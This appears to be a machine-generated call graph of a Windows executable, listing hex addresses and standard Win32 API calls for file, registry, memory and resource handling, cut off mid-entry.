35 API calls 5965->5966 5967 40a9bf 5966->5967 6041 40953c 5968->6041 5971 4098cc 19 API calls 5972 40995c 5971->5972 5972->5939 5973->5940 5977 409350 5974->5977 5978 409375 CreateDirectoryA 5977->5978 5983 408dd8 18 API calls 5977->5983 5984 404c94 33 API calls 5977->5984 5987 407284 19 API calls 5977->5987 5990 408da8 18 API calls 5977->5990 5991 405890 18 API calls 5977->5991 6097 406cf4 5977->6097 6120 409224 5977->6120 5979 4093ed 5978->5979 5980 40937f GetLastError 5978->5980 5981 40322c 4 API calls 5979->5981 5980->5977 5982 4093f7 5981->5982 5985 4031b8 4 API calls 5982->5985 5983->5977 5984->5977 5986 409411 5985->5986 5988 4031b8 4 API calls 5986->5988 5987->5977 5989 40941e 5988->5989 5989->5945 5990->5977 5991->5977 6226 406820 5992->6226 5995 403454 18 API calls 5996 40694a 5995->5996 5997 4066c0 5996->5997 6231 4068e4 5997->6231 6000 4066f0 6003 403340 18 API calls 6000->6003 6001 4066fe 6002 403454 18 API calls 6001->6002 6005 406711 6002->6005 6004 4066fc 6003->6004 6007 403198 4 API calls 6004->6007 6006 403340 18 API calls 6005->6006 6006->6004 6008 406733 6007->6008 6009 406638 6008->6009 6010 406642 6009->6010 6011 406665 6009->6011 6237 406950 6010->6237 6013 40322c 4 API calls 6011->6013 6014 40666e 6013->6014 6014->5955 6015 406649 6015->6011 6016 406654 6015->6016 6017 403340 18 API calls 6016->6017 6018 406662 6017->6018 6018->5955 6020 403344 6019->6020 6021 4033a5 6019->6021 6022 4031e8 6020->6022 6023 40334c 6020->6023 6028 403254 18 API calls 6022->6028 6029 4031fc 6022->6029 6023->6021 6025 40335b 6023->6025 6026 4031e8 18 API calls 6023->6026 6024 403228 6024->5957 6027 403254 18 API calls 6025->6027 6026->6025 6031 403375 6027->6031 6028->6029 6029->6024 6030 4025ac 4 API calls 6029->6030 6030->6024 6032 4031e8 18 API calls 6031->6032 6033 4033a1 6032->6033 6033->5957 6035 408da8 18 API calls 6034->6035 6036 408df4 6035->6036 6036->5944 6038 405869 6037->6038 6039 405940 19 API calls 6038->6039 6040 40587b 6039->6040 6040->6040 6048 
40955b 6041->6048 6042 409590 6044 40959d GetUserDefaultLangID 6042->6044 6049 409592 6042->6049 6043 409594 6053 407024 GetModuleHandleA GetProcAddress 6043->6053 6044->6049 6047 40956f 6047->5971 6048->6042 6048->6043 6048->6047 6049->6047 6050 4095cb GetACP 6049->6050 6051 4095ef 6049->6051 6050->6047 6050->6049 6051->6047 6052 409615 GetACP 6051->6052 6052->6047 6052->6051 6054 407067 6053->6054 6055 40705e 6053->6055 6056 407070 6054->6056 6057 4070a8 6054->6057 6064 403198 4 API calls 6055->6064 6074 406f68 6056->6074 6058 406f68 RegOpenKeyExA 6057->6058 6062 4070c1 6058->6062 6060 407089 6061 4070de 6060->6061 6077 406f5c 6060->6077 6066 40322c 4 API calls 6061->6066 6062->6061 6065 406f5c 20 API calls 6062->6065 6068 407120 6064->6068 6069 4070d5 RegCloseKey 6065->6069 6070 4070eb 6066->6070 6071 403198 4 API calls 6068->6071 6069->6061 6072 4032fc 18 API calls 6070->6072 6073 407128 6071->6073 6072->6055 6073->6049 6075 406f73 6074->6075 6076 406f79 RegOpenKeyExA 6074->6076 6075->6076 6076->6060 6080 406e10 6077->6080 6081 406e36 RegQueryValueExA 6080->6081 6082 406e7b 6081->6082 6088 406e59 6081->6088 6084 403198 4 API calls 6082->6084 6083 406e73 6085 403198 4 API calls 6083->6085 6086 406f47 RegCloseKey 6084->6086 6085->6082 6086->6061 6087 403278 18 API calls 6087->6088 6088->6082 6088->6083 6088->6087 6089 403420 18 API calls 6088->6089 6090 406eb0 RegQueryValueExA 6089->6090 6090->6081 6092 406ecc 6090->6092 6091 4034f0 18 API calls 6093 406f0e 6091->6093 6092->6082 6092->6091 6094 406f20 6093->6094 6096 403420 18 API calls 6093->6096 6095 4031e8 18 API calls 6094->6095 6095->6082 6096->6094 6139 406a58 6097->6139 6100 406d26 6102 406a58 19 API calls 6100->6102 6104 406d72 6100->6104 6103 406d36 6102->6103 6105 406d42 6103->6105 6108 406a34 21 API calls 6103->6108 6147 406888 6104->6147 6105->6104 6106 406d67 6105->6106 6109 406a58 19 API calls 6105->6109 6106->6104 6159 406cc8 GetWindowsDirectoryA 6106->6159 6108->6105 6112 406d5b 6109->6112 
6112->6106 6115 406a34 21 API calls 6112->6115 6113 406638 19 API calls 6114 406d87 6113->6114 6116 40322c 4 API calls 6114->6116 6115->6106 6117 406d91 6116->6117 6118 4031b8 4 API calls 6117->6118 6119 406dab 6118->6119 6119->5977 6121 409244 6120->6121 6122 406638 19 API calls 6121->6122 6123 40925d 6122->6123 6124 40322c 4 API calls 6123->6124 6131 409268 6124->6131 6125 406978 20 API calls 6125->6131 6127 408dd8 18 API calls 6127->6131 6128 4033b4 18 API calls 6128->6131 6130 405890 18 API calls 6130->6131 6131->6125 6131->6127 6131->6128 6131->6130 6132 4092e4 6131->6132 6199 4091b0 6131->6199 6207 409034 6131->6207 6133 40322c 4 API calls 6132->6133 6134 4092ef 6133->6134 6135 4031b8 4 API calls 6134->6135 6136 409309 6135->6136 6137 403198 4 API calls 6136->6137 6138 409311 6137->6138 6138->5977 6140 4034f0 18 API calls 6139->6140 6141 406a6b 6140->6141 6142 406a82 GetEnvironmentVariableA 6141->6142 6146 406a95 6141->6146 6161 406dec 6141->6161 6142->6141 6143 406a8e 6142->6143 6144 403198 4 API calls 6143->6144 6144->6146 6146->6100 6156 406a34 6146->6156 6148 403414 6147->6148 6149 4068ab GetFullPathNameA 6148->6149 6150 4068b7 6149->6150 6151 4068ce 6149->6151 6150->6151 6152 4068bf 6150->6152 6153 40322c 4 API calls 6151->6153 6154 403278 18 API calls 6152->6154 6155 4068cc 6153->6155 6154->6155 6155->6113 6165 4069dc 6156->6165 6160 406ce9 6159->6160 6160->6104 6162 406dfa 6161->6162 6163 4034f0 18 API calls 6162->6163 6164 406e08 6163->6164 6164->6141 6172 406978 6165->6172 6167 4069fe 6168 406a06 GetFileAttributesA 6167->6168 6169 406a1b 6168->6169 6170 403198 4 API calls 6169->6170 6171 406a23 6170->6171 6171->6100 6182 406744 6172->6182 6174 4069b0 6177 4069c6 6174->6177 6178 4069bb 6174->6178 6176 406989 6176->6174 6189 406970 CharPrevA 6176->6189 6190 403454 6177->6190 6179 40322c 4 API calls 6178->6179 6181 4069c4 6179->6181 6181->6167 6183 406755 6182->6183 6184 4067b9 6183->6184 6188 406773 6183->6188 6185 406680 IsDBCSLeadByte 6184->6185 6186 
4067b4 6184->6186 6185->6186 6186->6176 6188->6186 6197 406680 IsDBCSLeadByte 6188->6197 6189->6176 6191 403486 6190->6191 6192 403459 6190->6192 6193 403198 4 API calls 6191->6193 6192->6191 6195 40346d 6192->6195 6194 40347c 6193->6194 6194->6181 6196 403278 18 API calls 6195->6196 6196->6194 6198 406694 6197->6198 6198->6188 6200 403198 4 API calls 6199->6200 6202 4091d1 6200->6202 6204 4091fe 6202->6204 6216 4032a8 6202->6216 6219 403494 6202->6219 6205 403198 4 API calls 6204->6205 6206 409213 6205->6206 6206->6131 6208 408f70 2 API calls 6207->6208 6209 40904a 6208->6209 6210 40904e 6209->6210 6223 406a48 6209->6223 6210->6131 6213 409081 6214 408fac Wow64RevertWow64FsRedirection 6213->6214 6215 409089 6214->6215 6215->6131 6217 403278 18 API calls 6216->6217 6218 4032b5 6217->6218 6218->6202 6220 403498 6219->6220 6222 4034c3 6219->6222 6221 4034f0 18 API calls 6220->6221 6221->6222 6222->6202 6224 4069dc 21 API calls 6223->6224 6225 406a52 GetLastError 6224->6225 6225->6213 6227 406744 IsDBCSLeadByte 6226->6227 6229 406835 6227->6229 6228 40687f 6228->5995 6229->6228 6230 406680 IsDBCSLeadByte 6229->6230 6230->6229 6232 4068f3 6231->6232 6233 406820 IsDBCSLeadByte 6232->6233 6236 4068fe 6233->6236 6234 4066ea 6234->6000 6234->6001 6235 406680 IsDBCSLeadByte 6235->6236 6236->6234 6236->6235 6238 406957 6237->6238 6239 40695b 6237->6239 6238->6015 6242 406970 CharPrevA 6239->6242 6241 40696c 6241->6015 6242->6241 6817 408f30 6820 408dfc 6817->6820 6821 408e05 6820->6821 6822 403198 4 API calls 6821->6822 6823 408e13 6821->6823 6822->6821 6824 403932 6825 403924 6824->6825 6826 40374c VariantClear 6825->6826 6827 40392c 6826->6827 5387 4075c4 SetFilePointer 5388 4075f7 5387->5388 5389 4075e7 GetLastError 5387->5389 5389->5388 5390 4075f0 5389->5390 5392 40748c GetLastError 5390->5392 5395 4073ec 5392->5395 5396 407284 19 API calls 5395->5396 5398 407414 5396->5398 5397 407434 5400 405890 18 API calls 5397->5400 5398->5397 5399 405194 33 API calls 5398->5399 
5399->5397 5401 407443 5400->5401 5402 403198 4 API calls 5401->5402 5403 407460 5402->5403 5403->5388 6418 4076c8 WriteFile 6419 4076e8 6418->6419 6422 4076ef 6418->6422 6420 40748c 35 API calls 6419->6420 6420->6422 6421 407700 6422->6421 6423 4073ec 34 API calls 6422->6423 6423->6421 6424 402ccc 6427 402cfe 6424->6427 6428 402cdd 6424->6428 6425 402d88 RtlUnwind 6426 403154 4 API calls 6425->6426 6426->6427 6428->6425 6428->6427 6429 402b28 RaiseException 6428->6429 6430 402d7f 6429->6430 6430->6425 6836 403fcd 6837 403f07 4 API calls 6836->6837 6838 403fd6 6837->6838 6839 403e9c 4 API calls 6838->6839 6840 403fe2 6839->6840 6437 4024d0 6438 4024e4 6437->6438 6439 4024e9 6437->6439 6442 401918 4 API calls 6438->6442 6440 402518 6439->6440 6441 40250e RtlEnterCriticalSection 6439->6441 6444 4024ed 6439->6444 6452 402300 6440->6452 6441->6440 6442->6439 6445 402525 6448 402581 6445->6448 6449 402577 RtlLeaveCriticalSection 6445->6449 6447 401fd4 14 API calls 6450 402531 6447->6450 6449->6448 6450->6445 6451 40215c 9 API calls 6450->6451 6451->6445 6453 402314 6452->6453 6455 4023b8 6453->6455 6456 402335 6453->6456 6454 402344 6454->6445 6454->6447 6455->6454 6457 401d80 9 API calls 6455->6457 6460 402455 6455->6460 6462 401e84 6455->6462 6456->6454 6458 401b74 9 API calls 6456->6458 6457->6455 6458->6454 6460->6454 6461 401d00 9 API calls 6460->6461 6461->6454 6467 401768 6462->6467 6464 401e99 6465 401ea6 6464->6465 6466 401dcc 9 API calls 6464->6466 6465->6455 6466->6465 6469 401787 6467->6469 6468 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6468->6469 6469->6468 6470 40183b 6469->6470 6471 40132c LocalAlloc 6469->6471 6473 401821 6469->6473 6475 4017d6 6469->6475 6472 4015c4 VirtualAlloc 6470->6472 6476 4017e7 6470->6476 6471->6469 6472->6476 6474 40150c VirtualFree 6473->6474 6474->6476 6477 40150c VirtualFree 6475->6477 6476->6464 6477->6476 6478 4028d2 6479 4028da 6478->6479 6480 403554 4 API calls 6479->6480 6481 4028ef 6479->6481 6480->6479 
6482 4025ac 4 API calls 6481->6482 6483 4028f4 6482->6483 6841 4019d3 6842 4019ba 6841->6842 6843 4019c3 RtlLeaveCriticalSection 6842->6843 6844 4019cd 6842->6844 6843->6844 5404 407fd4 5405 407fe6 5404->5405 5406 407fed 5404->5406 5415 407f10 5405->5415 5408 408021 5406->5408 5409 408015 5406->5409 5410 408017 5406->5410 5411 40804e 5408->5411 5413 407d7c 33 API calls 5408->5413 5429 407e2c 5409->5429 5426 407d7c 5410->5426 5413->5411 5416 407f25 5415->5416 5417 407d7c 33 API calls 5416->5417 5418 407f34 5416->5418 5417->5418 5419 407f6e 5418->5419 5420 407d7c 33 API calls 5418->5420 5421 407f82 5419->5421 5422 407d7c 33 API calls 5419->5422 5420->5419 5425 407fae 5421->5425 5436 407eb8 5421->5436 5422->5421 5425->5406 5439 4058c4 5426->5439 5428 407d9e 5428->5408 5430 405194 33 API calls 5429->5430 5431 407e57 5430->5431 5447 407de4 5431->5447 5433 407e5f 5434 403198 4 API calls 5433->5434 5435 407e74 5434->5435 5435->5408 5437 407ec7 VirtualFree 5436->5437 5438 407ed9 VirtualAlloc 5436->5438 5437->5438 5438->5425 5441 4058d0 5439->5441 5440 405194 33 API calls 5442 4058fd 5440->5442 5441->5440 5443 4031e8 18 API calls 5442->5443 5444 405908 5443->5444 5445 403198 4 API calls 5444->5445 5446 40591d 5445->5446 5446->5428 5448 4058c4 33 API calls 5447->5448 5449 407e06 5448->5449 5449->5433 6484 405ad4 6485 405ae4 6484->6485 6486 405adc 6484->6486 6487 405ae2 6486->6487 6488 405aeb 6486->6488 6491 405a4c 6487->6491 6489 405940 19 API calls 6488->6489 6489->6485 6492 405a54 6491->6492 6493 405a6e 6492->6493 6494 403154 4 API calls 6492->6494 6495 405a73 6493->6495 6496 405a8a 6493->6496 6494->6492 6497 405940 19 API calls 6495->6497 6498 403154 4 API calls 6496->6498 6499 405a86 6497->6499 6500 405a8f 6498->6500 6502 403154 4 API calls 6499->6502 6501 4059b0 33 API calls 6500->6501 6501->6499 6503 405ab8 6502->6503 6504 403154 4 API calls 6503->6504 6505 405ac6 6504->6505 6505->6485 5917 40a9de 5918 40aa03 5917->5918 5919 407918 InterlockedExchange 5918->5919 5920 
40aa2d 5919->5920 5921 40aa3d 5920->5921 5922 409ae8 18 API calls 5920->5922 5927 4076ac SetEndOfFile 5921->5927 5922->5921 5924 40aa59 5925 4025ac 4 API calls 5924->5925 5926 40aa90 5925->5926 5928 4076c3 5927->5928 5929 4076bc 5927->5929 5928->5924 5930 40748c 35 API calls 5929->5930 5930->5928 6848 402be9 RaiseException 6849 402c04 6848->6849 6516 402af2 6517 402afe 6516->6517 6520 402ed0 6517->6520 6521 403154 4 API calls 6520->6521 6522 402ee0 6521->6522 6523 402b03 6522->6523 6525 402b0c 6522->6525 6526 402b25 6525->6526 6527 402b15 RaiseException 6525->6527 6526->6523 6527->6526 5455 40a5f8 5498 4030dc 5455->5498 5457 40a60e 5501 4042e8 5457->5501 5459 40a613 5504 40457c GetModuleHandleA GetProcAddress 5459->5504 5463 40a61d 5512 4065c8 5463->5512 5465 40a622 5521 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5465->5521 5472 40a665 5543 406c2c 5472->5543 5476 4031e8 18 API calls 5477 40a683 5476->5477 5557 4074e0 5477->5557 5483 407918 InterlockedExchange 5485 40a6d2 5483->5485 5484 40a710 5577 4074a0 5484->5577 5485->5484 5614 409ae8 5485->5614 5487 40a751 5581 407a28 5487->5581 5488 40a736 5488->5487 5489 409ae8 18 API calls 5488->5489 5489->5487 5491 40a776 5591 408b08 5491->5591 5495 40a7bc 5496 408b08 35 API calls 5495->5496 5497 40a7f5 5495->5497 5496->5495 5624 403094 5498->5624 5500 4030e1 GetModuleHandleA GetCommandLineA 5500->5457 5502 403154 4 API calls 5501->5502 5503 404323 5501->5503 5502->5503 5503->5459 5505 404598 5504->5505 5506 40459f GetProcAddress 5504->5506 5505->5506 5507 4045b5 GetProcAddress 5506->5507 5508 4045ae 5506->5508 5509 4045c4 SetProcessDEPPolicy 5507->5509 5510 4045c8 5507->5510 5508->5507 5509->5510 5511 404624 6F561CD0 5510->5511 5511->5463 5625 405ca8 5512->5625 5522 4090f7 5521->5522 5709 406fa0 SetErrorMode 5522->5709 5525 407284 19 API calls 5526 409127 5525->5526 5527 403198 4 API calls 5526->5527 5528 40913c 5527->5528 5529 409b78 GetSystemInfo VirtualQuery 5528->5529 5530 409ba2 5529->5530 
5531 409c2c 5529->5531 5530->5531 5532 409c0d VirtualQuery 5530->5532 5533 409bcc VirtualProtect 5530->5533 5534 409bfb VirtualProtect 5530->5534 5535 409768 5531->5535 5532->5530 5532->5531 5533->5530 5534->5532 5715 406bd0 GetCommandLineA 5535->5715 5537 409850 5538 4031b8 4 API calls 5537->5538 5540 40986a 5538->5540 5539 406c2c 20 API calls 5541 409785 5539->5541 5540->5472 5607 409c88 5540->5607 5541->5537 5541->5539 5542 403454 18 API calls 5541->5542 5542->5541 5544 406c53 GetModuleFileNameA 5543->5544 5545 406c77 GetCommandLineA 5543->5545 5546 403278 18 API calls 5544->5546 5553 406c7c 5545->5553 5547 406c75 5546->5547 5551 406ca4 5547->5551 5548 406c81 5549 403198 4 API calls 5548->5549 5552 406c89 5549->5552 5550 406af0 18 API calls 5550->5553 5554 403198 4 API calls 5551->5554 5555 40322c 4 API calls 5552->5555 5553->5548 5553->5550 5553->5552 5556 406cb9 5554->5556 5555->5551 5556->5476 5558 4074ea 5557->5558 5722 407576 5558->5722 5725 407578 5558->5725 5559 407516 5560 40752a 5559->5560 5561 40748c 35 API calls 5559->5561 5564 409c34 FindResourceA 5560->5564 5561->5560 5565 409c49 5564->5565 5566 409c4e SizeofResource 5564->5566 5567 409ae8 18 API calls 5565->5567 5568 409c60 LoadResource 5566->5568 5569 409c5b 5566->5569 5567->5566 5571 409c73 LockResource 5568->5571 5572 409c6e 5568->5572 5570 409ae8 18 API calls 5569->5570 5570->5568 5574 409c84 5571->5574 5575 409c7f 5571->5575 5573 409ae8 18 API calls 5572->5573 5573->5571 5574->5483 5574->5485 5576 409ae8 18 API calls 5575->5576 5576->5574 5578 4074b4 5577->5578 5579 4074c4 5578->5579 5580 4073ec 34 API calls 5578->5580 5579->5488 5580->5579 5582 407a35 5581->5582 5583 405890 18 API calls 5582->5583 5584 407a89 5582->5584 5583->5584 5585 407918 InterlockedExchange 5584->5585 5586 407a9b 5585->5586 5587 405890 18 API calls 5586->5587 5588 407ab1 5586->5588 5587->5588 5589 405890 18 API calls 5588->5589 5590 407af4 5588->5590 5589->5590 5590->5491 5593 408b39 5591->5593 5598 408b82 5591->5598 
5592 408bcd 5728 407cb8 5592->5728 5596 4034f0 18 API calls 5593->5596 5593->5598 5601 403420 18 API calls 5593->5601 5602 4031e8 18 API calls 5593->5602 5606 407cb8 35 API calls 5593->5606 5595 407cb8 35 API calls 5595->5598 5596->5593 5597 408be4 5600 4031b8 4 API calls 5597->5600 5598->5592 5598->5595 5599 4034f0 18 API calls 5598->5599 5604 403420 18 API calls 5598->5604 5605 4031e8 18 API calls 5598->5605 5599->5598 5603 408bfe 5600->5603 5601->5593 5602->5593 5621 404c20 5603->5621 5604->5598 5605->5598 5606->5593 5608 40322c 4 API calls 5607->5608 5609 409cab 5608->5609 5610 409cba MessageBoxA 5609->5610 5611 409ccf 5610->5611 5612 403198 4 API calls 5611->5612 5613 409cd7 5612->5613 5613->5472 5615 409af1 5614->5615 5616 409b09 5614->5616 5618 405890 18 API calls 5615->5618 5617 405890 18 API calls 5616->5617 5619 409b1a 5617->5619 5620 409b03 5618->5620 5619->5484 5620->5484 5750 402594 5621->5750 5623 404c2b 5623->5495 5624->5500 5626 405940 19 API calls 5625->5626 5627 405cb9 5626->5627 5628 405280 GetSystemDefaultLCID 5627->5628 5632 4052b6 5628->5632 5629 404cdc 19 API calls 5629->5632 5630 40520c 19 API calls 5630->5632 5631 4031e8 18 API calls 5631->5632 5632->5629 5632->5630 5632->5631 5636 405318 5632->5636 5633 404cdc 19 API calls 5633->5636 5634 40520c 19 API calls 5634->5636 5635 4031e8 18 API calls 5635->5636 5636->5633 5636->5634 5636->5635 5637 40539b 5636->5637 5638 4031b8 4 API calls 5637->5638 5639 4053b5 5638->5639 5640 4053c4 GetSystemDefaultLCID 5639->5640 5697 40520c GetLocaleInfoA 5640->5697 5643 4031e8 18 API calls 5644 405404 5643->5644 5645 40520c 19 API calls 5644->5645 5646 405419 5645->5646 5647 40520c 19 API calls 5646->5647 5648 40543d 5647->5648 5703 405258 GetLocaleInfoA 5648->5703 5651 405258 GetLocaleInfoA 5652 40546d 5651->5652 5653 40520c 19 API calls 5652->5653 5654 405487 5653->5654 5655 405258 GetLocaleInfoA 5654->5655 5656 4054a4 5655->5656 5657 40520c 19 API calls 5656->5657 5658 4054be 5657->5658 5659 4031e8 18 API 
calls 5658->5659 5660 4054cb 5659->5660 5661 40520c 19 API calls 5660->5661 5662 4054e0 5661->5662 5663 4031e8 18 API calls 5662->5663 5664 4054ed 5663->5664 5665 405258 GetLocaleInfoA 5664->5665 5666 4054fb 5665->5666 5667 40520c 19 API calls 5666->5667 5668 405515 5667->5668 5669 4031e8 18 API calls 5668->5669 5670 405522 5669->5670 5671 40520c 19 API calls 5670->5671 5672 405537 5671->5672 5673 4031e8 18 API calls 5672->5673 5674 405544 5673->5674 5675 40520c 19 API calls 5674->5675 5676 405559 5675->5676 5677 405576 5676->5677 5678 405567 5676->5678 5680 40322c 4 API calls 5677->5680 5705 40322c 5678->5705 5681 405574 5680->5681 5682 40520c 19 API calls 5681->5682 5683 405598 5682->5683 5684 4055b5 5683->5684 5685 4055a6 5683->5685 5687 403198 4 API calls 5684->5687 5686 40322c 4 API calls 5685->5686 5688 4055b3 5686->5688 5687->5688 5689 4033b4 18 API calls 5688->5689 5690 4055d7 5689->5690 5691 4033b4 18 API calls 5690->5691 5692 4055f1 5691->5692 5693 4031b8 4 API calls 5692->5693 5694 40560b 5693->5694 5695 405cf4 GetVersionExA 5694->5695 5696 405d0b 5695->5696 5696->5465 5698 405233 5697->5698 5699 405245 5697->5699 5700 403278 18 API calls 5698->5700 5701 40322c 4 API calls 5699->5701 5702 405243 5700->5702 5701->5702 5702->5643 5704 405274 5703->5704 5704->5651 5707 403230 5705->5707 5706 403252 5706->5681 5707->5706 5708 4025ac 4 API calls 5707->5708 5708->5706 5713 403414 5709->5713 5712 406fee 5712->5525 5714 403418 LoadLibraryA 5713->5714 5714->5712 5716 406af0 18 API calls 5715->5716 5717 406bf3 5716->5717 5718 406af0 18 API calls 5717->5718 5719 406c05 5717->5719 5718->5717 5720 403198 4 API calls 5719->5720 5721 406c1a 5720->5721 5721->5541 5723 407578 5722->5723 5724 4075b7 CreateFileA 5723->5724 5724->5559 5726 403414 5725->5726 5727 4075b7 CreateFileA 5726->5727 5727->5559 5729 407cd3 5728->5729 5733 407cc8 5728->5733 5734 407c5c 5729->5734 5732 405890 18 API calls 5732->5733 5733->5597 5735 407c70 5734->5735 5736 407caf 5734->5736 5735->5736 
5738 407bac 5735->5738 5736->5732 5736->5733 5739 407bb7 5738->5739 5740 407bc8 5738->5740 5741 405890 18 API calls 5739->5741 5742 4074a0 34 API calls 5740->5742 5741->5740 5743 407bdc 5742->5743 5744 4074a0 34 API calls 5743->5744 5745 407bfd 5744->5745 5746 407918 InterlockedExchange 5745->5746 5747 407c12 5746->5747 5748 407c28 5747->5748 5749 405890 18 API calls 5747->5749 5748->5735 5749->5748 5751 402598 5750->5751 5753 4025a2 5750->5753 5756 401fd4 5751->5756 5752 40259e 5752->5753 5754 403154 4 API calls 5752->5754 5753->5623 5753->5753 5754->5753 5757 401fe8 5756->5757 5758 401fed 5756->5758 5767 401918 RtlInitializeCriticalSection 5757->5767 5760 402012 RtlEnterCriticalSection 5758->5760 5761 40201c 5758->5761 5764 401ff1 5758->5764 5760->5761 5761->5764 5774 401ee0 5761->5774 5764->5752 5765 402147 5765->5752 5766 40213d RtlLeaveCriticalSection 5766->5765 5768 40193c RtlEnterCriticalSection 5767->5768 5769 401946 5767->5769 5768->5769 5770 401964 LocalAlloc 5769->5770 5771 40197e 5770->5771 5772 4019c3 RtlLeaveCriticalSection 5771->5772 5773 4019cd 5771->5773 5772->5773 5773->5758 5777 401ef0 5774->5777 5775 401f1c 5779 401f40 5775->5779 5785 401d00 5775->5785 5777->5775 5777->5779 5780 401e58 5777->5780 5779->5765 5779->5766 5789 4016d8 5780->5789 5784 401e75 5784->5777 5786 401d4e 5785->5786 5787 401d1e 5785->5787 5786->5787 5858 401c68 5786->5858 5787->5779 5793 4016f4 5789->5793 5791 4016fe 5814 4015c4 5791->5814 5793->5791 5796 40174f 5793->5796 5798 40175b 5793->5798 5806 401430 5793->5806 5818 40132c 5793->5818 5795 40170a 5795->5798 5822 40150c 5796->5822 5798->5784 5799 401dcc 5798->5799 5832 401d80 5799->5832 5802 40132c LocalAlloc 5803 401df0 5802->5803 5804 401df8 5803->5804 5836 401b44 5803->5836 5804->5784 5807 40143f VirtualAlloc 5806->5807 5809 40146c 5807->5809 5810 40148f 5807->5810 5826 4012e4 5809->5826 5810->5793 5813 40147c VirtualFree 5813->5810 5816 40160a 5814->5816 5815 40163a 5815->5795 5816->5815 5817 401626 VirtualAlloc 
5816->5817 5817->5815 5817->5816 5819 401348 5818->5819 5820 4012e4 LocalAlloc 5819->5820 5821 40138f 5820->5821 5821->5793 5825 40153b 5822->5825 5823 401594 5823->5798 5824 401568 VirtualFree 5824->5825 5825->5823 5825->5824 5829 40128c 5826->5829 5830 401298 LocalAlloc 5829->5830 5831 4012aa 5829->5831 5830->5831 5831->5810 5831->5813 5833 401d92 5832->5833 5834 401d89 5832->5834 5833->5802 5834->5833 5841 401b74 5834->5841 5837 401b61 5836->5837 5838 401b52 5836->5838 5837->5804 5839 401d00 9 API calls 5838->5839 5840 401b5f 5839->5840 5840->5804 5844 40215c 5841->5844 5843 401b95 5843->5833 5845 40217a 5844->5845 5846 402175 5844->5846 5848 4021ab RtlEnterCriticalSection 5845->5848 5851 40217e 5845->5851 5854 4021b5 5845->5854 5847 401918 4 API calls 5846->5847 5847->5845 5848->5854 5849 4021c1 5852 4022e3 RtlLeaveCriticalSection 5849->5852 5853 4022ed 5849->5853 5850 402244 5850->5851 5855 401d80 7 API calls 5850->5855 5851->5843 5852->5853 5853->5843 5854->5849 5854->5850 5856 402270 5854->5856 5855->5851 5856->5849 5857 401d00 7 API calls 5856->5857 5857->5849 5859 401c7a 5858->5859 5860 401c9d 5859->5860 5861 401caf 5859->5861 5871 40188c 5860->5871 5863 40188c 3 API calls 5861->5863 5864 401cad 5863->5864 5865 401b44 9 API calls 5864->5865 5870 401cc5 5864->5870 5866 401cd4 5865->5866 5867 401cee 5866->5867 5881 401b98 5866->5881 5886 4013a0 5867->5886 5870->5787 5872 4018b2 5871->5872 5880 40190b 5871->5880 5890 401658 5872->5890 5875 40132c LocalAlloc 5876 4018cf 5875->5876 5877 4018e6 5876->5877 5878 40150c VirtualFree 5876->5878 5879 4013a0 LocalAlloc 5877->5879 5877->5880 5878->5877 5879->5880 5880->5864 5882 401b9d 5881->5882 5883 401bab 5881->5883 5884 401b74 9 API calls 5882->5884 5883->5867 5885 401baa 5884->5885 5885->5867 5887 4013ab 5886->5887 5888 4012e4 LocalAlloc 5887->5888 5889 4013c6 5887->5889 5888->5889 5889->5870 5892 40168f 5890->5892 5891 4016cf 5891->5875 5892->5891 5893 4016a9 VirtualFree 5892->5893 5893->5892 6850 402dfa 6851 
402e26 6850->6851 6852 402e0d 6850->6852 6854 402ba4 6852->6854 6855 402bc9 6854->6855 6856 402bad 6854->6856 6855->6851 6857 402bb5 RaiseException 6856->6857 6857->6855 6858 4075fa GetFileSize 6859 407626 6858->6859 6860 407616 GetLastError 6858->6860 6860->6859 6861 40761f 6860->6861 6862 40748c 35 API calls 6861->6862 6862->6859 6863 406ffb 6864 407008 SetErrorMode 6863->6864 6532 403a80 CloseHandle 6533 403a90 6532->6533 6534 403a91 GetLastError 6532->6534 6535 404283 6536 4042c3 6535->6536 6537 403154 4 API calls 6536->6537 6538 404323 6537->6538 6865 404185 6866 4041ff 6865->6866 6867 403154 4 API calls 6866->6867 6868 4041cc 6866->6868 6869 404323 6867->6869 6539 403e87 6540 403e4c 6539->6540 6541 403e62 6540->6541 6542 403e7b 6540->6542 6543 403e67 6540->6543 6548 403cc8 6541->6548 6544 402674 4 API calls 6542->6544 6546 403e78 6543->6546 6552 402674 6543->6552 6544->6546 6549 403cd6 6548->6549 6550 402674 4 API calls 6549->6550 6551 403ceb 6549->6551 6550->6551 6551->6543 6553 403154 4 API calls 6552->6553 6554 40267a 6553->6554 6554->6546 6563 407e90 6564 407eb8 VirtualFree 6563->6564 6565 407e9d 6564->6565 6568 403e95 6569 403e4c 6568->6569 6570 403e62 6569->6570 6571 403e7b 6569->6571 6572 403e67 6569->6572 6574 403cc8 4 API calls 6570->6574 6573 402674 4 API calls 6571->6573 6575 403e78 6572->6575 6576 402674 4 API calls 6572->6576 6573->6575 6574->6572 6576->6575 6577 40ac97 6586 4096fc 6577->6586 6580 402f24 5 API calls 6581 40aca1 6580->6581 6582 403198 4 API calls 6581->6582 6583 40acc0 6582->6583 6584 403198 4 API calls 6583->6584 6585 40acc8 6584->6585 6595 4056ac 6586->6595 6588 409745 6592 403198 4 API calls 6588->6592 6589 409717 6589->6588 6601 40720c 6589->6601 6591 409735 6594 40973d MessageBoxA 6591->6594 6593 40975a 6592->6593 6593->6580 6593->6581 6594->6588 6596 403154 4 API calls 6595->6596 6597 4056b1 6596->6597 6598 4056c9 6597->6598 6599 403154 4 API calls 6597->6599 6598->6589 6600 4056bf 6599->6600 6600->6589 6602 4056ac 4 API 
